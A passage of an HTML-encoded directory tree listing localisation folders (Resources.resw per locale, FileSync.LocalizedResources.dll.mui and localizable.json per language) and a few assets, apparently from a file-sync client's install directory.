&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MR-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MS-MY
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MT-MT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NB-NO
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NE-NP
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NL-NL
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; NN-NO
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; OR-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; PA-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; PL-PL
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; PT-BR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; PT-PT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; QUZ-PE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ro-RO
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; RU-RU
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SK-SK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SL-SI
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SQ-AL
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SR-CYRL-BA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SR-CYRL-RS
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SR-LATN-RS
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SV-SE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; TA-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; TE-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; TH-TH
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; TR-TR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; TT-RU
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; UG-CN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; UK-UA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; UR-PK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; UZ-LATN-UZ
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; VI-VN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; zh-CN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; ZH-TW
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; cs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; cy-GB
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; da
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DateTimePicker.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; de
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DimeErrorPage.html
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; el
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ElevatedAppBlue.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ElevatedAppWhite.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; en
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
